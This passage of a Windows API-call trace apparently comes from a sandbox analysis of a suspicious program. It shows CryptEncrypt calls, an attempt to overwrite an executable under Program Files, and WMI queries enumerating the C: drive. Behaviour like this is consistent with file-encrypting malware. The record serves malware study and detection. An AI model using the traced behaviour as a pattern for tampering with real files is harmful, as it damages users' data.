CryptContextAddRef (hProv=0x7a9178, pdwReserved=0x0, dwFlags=0x0) returned 1 [0150.810] CryptSetKeyParam (hKey=0x77b1b0, dwParam=0x4, pbData=0x35b2898*=0x1, dwFlags=0x0) returned 1 [0150.810] CryptSetKeyParam (hKey=0x77b1b0, dwParam=0x1, pbData=0x35b2864, dwFlags=0x0) returned 1 [0150.810] CryptEncrypt (in: hKey=0x77b1b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x35b28a8*, pdwDataLen=0x6bceea8*=0x13a10, dwBufLen=0x13a10 | out: pbData=0x35b28a8*, pdwDataLen=0x6bceea8*=0x13a10) returned 1 [0150.811] CryptEncrypt (in: hKey=0x77b1b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35c62dc*, pdwDataLen=0x6bceeb0*=0x0, dwBufLen=0x10 | out: pbData=0x35c62dc*, pdwDataLen=0x6bceeb0*=0x10) returned 1 [0151.093] CryptDestroyKey (hKey=0x77b4f0) returned 1 [0151.122] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0151.122] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0151.162] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\alftp.exe", nBufferLength=0x105, lpBuffer=0x6bce920, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\alftp.exe", lpFilePart=0x0) returned 0x27 [0151.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6bcee14) returned 1 [0151.163] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\alftp.exe" (normalized: "c:\\program files\\common files\\alftp.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0151.472] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6bcdc50) returned 1 [0151.472] CoTaskMemAlloc (cb=0x20c) returned 0x6f2e948 [0151.472] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x6f2e948 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0151.472] CoTaskMemFree (pv=0x6f2e948) [0151.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6bce908, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0151.472] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcee50 | out: ppv=0x6bcee50*=0x72015c) returned 0x0 [0151.473] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcee48 | out: pAptType=0x6bcee48*=1) returned 0x0 [0151.473] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcee4c | out: ppvObject=0x6bcee4c*=0x0) returned 0x80004002 [0151.473] IUnknown:Release (This=0x72015c) returned 0x1 [0151.474] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce7b8 | out: ppv=0x6bce7b8*=0x6737018) returned 0x0 [0151.474] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737018, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce9d0 | out: ppvObject=0x6bce9d0*=0x0) returned 0x80004002 [0151.474] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6737018, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce9e4 | out: ppvObject=0x6bce9e4*=0x6737e40) returned 0x0 [0151.474] WbemDefPath:IUnknown:Release (This=0x6737018) returned 0x0 [0151.474] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce604 | out: ppvObject=0x6bce604*=0x6737e40) returned 0x0 [0151.474] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce5c0 | out: ppvObject=0x6bce5c0*=0x0) returned 0x80004002 [0151.474] WbemDefPath:IUnknown:AddRef (This=0x6737e40) returned 0x3 [0151.474] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcdf1c | out: ppvObject=0x6bcdf1c*=0x0) returned 0x80004002 [0151.474] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcdecc | out: ppvObject=0x6bcdecc*=0x0) returned 0x80004002 [0151.474] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcded8 | out: ppvObject=0x6bcded8*=0x77dce8) returned 0x0 [0151.474] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77dce8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcdee0 | out: pCid=0x6bcdee0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0151.474] WbemDefPath:IUnknown:Release (This=0x77dce8) returned 0x3 [0151.474] CoGetContextToken (in: pToken=0x6bcdf38 | out: pToken=0x6bcdf38) returned 0x0 [0151.474] CoGetContextToken (in: pToken=0x6bce340 | out: pToken=0x6bce340) returned 0x0 [0151.475] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce3d0 | out: ppvObject=0x6bce3d0*=0x0) returned 0x80004002 [0151.475] WbemDefPath:IUnknown:Release (This=0x6737e40) returned 0x2 [0151.475] WbemDefPath:IUnknown:Release (This=0x6737e40) returned 0x1 [0151.475] CoGetContextToken (in: pToken=0x6bcecc8 | out: pToken=0x6bcecc8) returned 0x0 [0151.475] CoGetContextToken (in: pToken=0x6bcec28 | out: pToken=0x6bcec28) returned 0x0 [0151.475] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737e40, riid=0x6bcecf8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcecf4 | out: ppvObject=0x6bcecf4*=0x6737e40) returned 0x0 [0151.475] WbemDefPath:IUnknown:AddRef (This=0x6737e40) returned 0x3 [0151.475] WbemDefPath:IUnknown:Release (This=0x6737e40) returned 0x2 [0151.475] WbemDefPath:IWbemPath:SetText (This=0x6737e40, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737e40, puCount=0x6bcee7c | out: puCount=0x6bcee7c*=0x0) returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetText (in: This=0x6737e40, lFlags=2, puBuffLength=0x6bcee78*=0x0, pszText=0x0 | out: puBuffLength=0x6bcee78*=0x20, pszText=0x0) returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetText (in: This=0x6737e40, lFlags=2, puBuffLength=0x6bcee78*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6bcee78*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetInfo (in: This=0x6737e40, uRequestedInfo=0x0, puResponse=0x6bcee84 | out: puResponse=0x6bcee84*=0xc19) returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737e40, puCount=0x6bcee7c | out: puCount=0x6bcee7c*=0x0) returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetInfo (in: This=0x6737e40, uRequestedInfo=0x0, puResponse=0x6bcee84 | out: puResponse=0x6bcee84*=0xc19) returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetInfo (in: This=0x6737e40, uRequestedInfo=0x0, puResponse=0x6bcee84 | out: puResponse=0x6bcee84*=0xc19) returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737e40, puCount=0x6bcedfc | out: puCount=0x6bcedfc*=0x0) returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67209c0, puCount=0x6bcede8 | out: puCount=0x6bcede8*=0x2) returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bcede4*=0x0, pszText=0x0 | out: puBuffLength=0x6bcede4*=0xf, pszText=0x0) returned 0x0 [0151.475] WbemDefPath:IWbemPath:GetText (in: This=0x67209c0, lFlags=4, puBuffLength=0x6bcede4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcede4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.475] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bced98 | out: ppv=0x6bced98*=0x72015c) returned 0x0 [0151.475] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bced90 | out: pAptType=0x6bced90*=1) returned 0x0 [0151.475] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bced94 | out: ppvObject=0x6bced94*=0x0) returned 0x80004002 [0151.475] IUnknown:Release (This=0x72015c) returned 0x1 [0151.476] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce700 | out: ppv=0x6bce700*=0x6736da8) returned 0x0 [0151.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736da8, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bce918 | out: ppvObject=0x6bce918*=0x0) returned 0x80004002 [0151.476] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736da8, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce92c | out: ppvObject=0x6bce92c*=0x6737dd0) returned 0x0 [0151.476] WbemDefPath:IUnknown:Release (This=0x6736da8) returned 0x0 [0151.476] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce54c | out: ppvObject=0x6bce54c*=0x6737dd0) returned 0x0 [0151.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce508 | out: ppvObject=0x6bce508*=0x0) returned 0x80004002 [0151.477] WbemDefPath:IUnknown:AddRef (This=0x6737dd0) returned 0x3 [0151.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bcde64 | out: ppvObject=0x6bcde64*=0x0) returned 0x80004002 [0151.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bcde14 | out: ppvObject=0x6bcde14*=0x0) returned 0x80004002 [0151.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcde20 | out: ppvObject=0x6bcde20*=0x77bdf8) returned 0x0 [0151.477] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x77bdf8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6bcde28 | out: pCid=0x6bcde28*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0151.477] WbemDefPath:IUnknown:Release (This=0x77bdf8) returned 0x3 [0151.477] CoGetContextToken (in: pToken=0x6bcde80 | out: pToken=0x6bcde80) returned 0x0 [0151.477] CoGetContextToken (in: pToken=0x6bce288 | out: pToken=0x6bce288) returned 0x0 [0151.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce318 | out: ppvObject=0x6bce318*=0x0) returned 0x80004002 [0151.477] WbemDefPath:IUnknown:Release (This=0x6737dd0) returned 0x2 [0151.477] WbemDefPath:IUnknown:Release (This=0x6737dd0) returned 0x1 [0151.477] CoGetContextToken (in: pToken=0x6bcec10 | out: pToken=0x6bcec10) returned 0x0 [0151.477] CoGetContextToken (in: pToken=0x6bceb70 | out: pToken=0x6bceb70) returned 0x0 [0151.477] WbemDefPath:IUnknown:QueryInterface (in: This=0x6737dd0, riid=0x6bcec40*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6bcec3c | out: ppvObject=0x6bcec3c*=0x6737dd0) returned 0x0 [0151.477] WbemDefPath:IUnknown:AddRef (This=0x6737dd0) returned 0x3 [0151.477] WbemDefPath:IUnknown:Release (This=0x6737dd0) returned 0x2 [0151.477] WbemDefPath:IWbemPath:SetText (This=0x6737dd0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0151.477] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737dd0, puCount=0x6bcedc0 | out: puCount=0x6bcedc0*=0x2) returned 0x0 [0151.477] WbemDefPath:IWbemPath:GetText (in: This=0x6737dd0, lFlags=4, puBuffLength=0x6bcedbc*=0x0, pszText=0x0 | out: puBuffLength=0x6bcedbc*=0xf, pszText=0x0) returned 0x0 [0151.477] WbemDefPath:IWbemPath:GetText (in: This=0x6737dd0, lFlags=4, puBuffLength=0x6bcedbc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bcedbc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.478] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bcedc0 | out: ppv=0x6bcedc0*=0x72015c) returned 0x0 [0151.478] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x6bcedb8 | out: pAptType=0x6bcedb8*=1) returned 0x0 [0151.478] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6bcedbc | out: ppvObject=0x6bcedbc*=0x0) returned 0x80004002 [0151.478] IUnknown:Release (This=0x72015c) returned 0x1 [0151.478] CoGetClassObject (in: rclsid=0x7588d4*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6bce9e0 | out: ppv=0x6bce9e0*=0x673ec18) returned 0x0 [0151.478] WbemLocator:IUnknown:QueryInterface (in: This=0x673ec18, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6bcebf8 | out: ppvObject=0x6bcebf8*=0x0) returned 0x80004002 [0151.478] WbemLocator:IClassFactory:CreateInstance (in: This=0x673ec18, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bcec0c | out: ppvObject=0x6bcec0c*=0x6736d98) returned 0x0 [0151.479] WbemLocator:IUnknown:Release (This=0x673ec18) returned 0x0 [0151.479] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce82c | out: ppvObject=0x6bce82c*=0x6736d98) returned 0x0 [0151.479] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce7e8 | out: ppvObject=0x6bce7e8*=0x0) returned 0x80004002 [0151.479] WbemLocator:IUnknown:AddRef (This=0x6736d98) returned 0x3 [0151.479] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6bce144 | out: ppvObject=0x6bce144*=0x0) returned 0x80004002 [0151.479] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6bce0f4 | out: ppvObject=0x6bce0f4*=0x0) returned 0x80004002 [0151.479] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce100 | out: ppvObject=0x6bce100*=0x0) returned 0x80004002 [0151.479] CoGetContextToken (in: pToken=0x6bce160 | out: pToken=0x6bce160) returned 0x0 [0151.479] CoGetContextToken (in: pToken=0x6bce568 | out: pToken=0x6bce568) returned 0x0 [0151.479] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce5f8 | out: ppvObject=0x6bce5f8*=0x0) returned 0x80004002 [0151.479] WbemLocator:IUnknown:Release (This=0x6736d98) returned 0x2 [0151.479] WbemLocator:IUnknown:Release (This=0x6736d98) returned 0x1 [0151.479] CoGetContextToken (in: pToken=0x6bcebd8 | out: pToken=0x6bcebd8) returned 0x0 [0151.479] CoGetContextToken (in: pToken=0x6bceb38 | out: pToken=0x6bceb38) returned 0x0 [0151.480] WbemLocator:IUnknown:QueryInterface (in: This=0x6736d98, riid=0x6bcec08*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6bcec04 | out: ppvObject=0x6bcec04*=0x6736d98) returned 0x0 [0151.480] WbemLocator:IUnknown:AddRef (This=0x6736d98) returned 0x3 [0151.480] WbemLocator:IUnknown:Release (This=0x6736d98) returned 0x2 [0151.480] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6737dd0, puCount=0x6bced9c | out: puCount=0x6bced9c*=0x2) returned 0x0 [0151.480] WbemDefPath:IWbemPath:GetText (in: This=0x6737dd0, lFlags=8, puBuffLength=0x6bced98*=0x0, pszText=0x0 | out: puBuffLength=0x6bced98*=0xf, pszText=0x0) returned 0x0 [0151.480] WbemDefPath:IWbemPath:GetText (in: This=0x6737dd0, lFlags=8, puBuffLength=0x6bced98*=0xf, pszText="00000000000000" | out: puBuffLength=0x6bced98*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0151.480] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6bcec74 | out: ppv=0x6bcec74*=0x6736e08) returned 0x0 [0151.480] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736e08, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6bced08 | out: ppNamespace=0x6bced08*=0x6742f74) returned 0x0 [0151.766] WbemLocator:IUnknown:QueryInterface (in: This=0x6742f74, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceba4 | out: ppvObject=0x6bceba4*=0x780dc4) returned 0x0 [0151.766] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780dc4, pProxy=0x6742f74, pAuthnSvc=0x6bcebf4, pAuthzSvc=0x6bcebf0, pServerPrincName=0x6bcebe8, pAuthnLevel=0x6bcebec, pImpLevel=0x6bcebdc, pAuthInfo=0x6bcebe0, pCapabilites=0x6bcebe4 | out: pAuthnSvc=0x6bcebf4*=0xa, pAuthzSvc=0x6bcebf0*=0x0, pServerPrincName=0x6bcebe8, pAuthnLevel=0x6bcebec*=0x6, pImpLevel=0x6bcebdc*=0x2, pAuthInfo=0x6bcebe0, pCapabilites=0x6bcebe4*=0x1) returned 0x0 [0151.766] WbemLocator:IUnknown:Release (This=0x780dc4) returned 0x1 [0151.767] WbemLocator:IUnknown:QueryInterface (in: This=0x6742f74, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb98 | out: ppvObject=0x6bceb98*=0x780de4) returned 0x0 [0151.767] WbemLocator:IUnknown:QueryInterface (in: This=0x6742f74, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bceb94 | out: ppvObject=0x6bceb94*=0x780dc4) returned 0x0 [0151.767] WbemLocator:IClientSecurity:SetBlanket (This=0x780dc4, pProxy=0x6742f74, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0151.767] WbemLocator:IUnknown:Release (This=0x780dc4) returned 0x2 [0151.767] WbemLocator:IUnknown:Release (This=0x780de4) returned 0x1 [0151.767] CoTaskMemFree (pv=0x77e148) [0151.767] WbemLocator:IUnknown:Release (This=0x6736e08) returned 0x0 [0151.767] WbemLocator:IUnknown:QueryInterface (in: This=0x6742f74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6bce794 | out: ppvObject=0x6bce794*=0x780de4) returned 0x0 [0151.767] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6bce750 | out: ppvObject=0x6bce750*=0x0) returned 0x80004002 [0151.767] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, 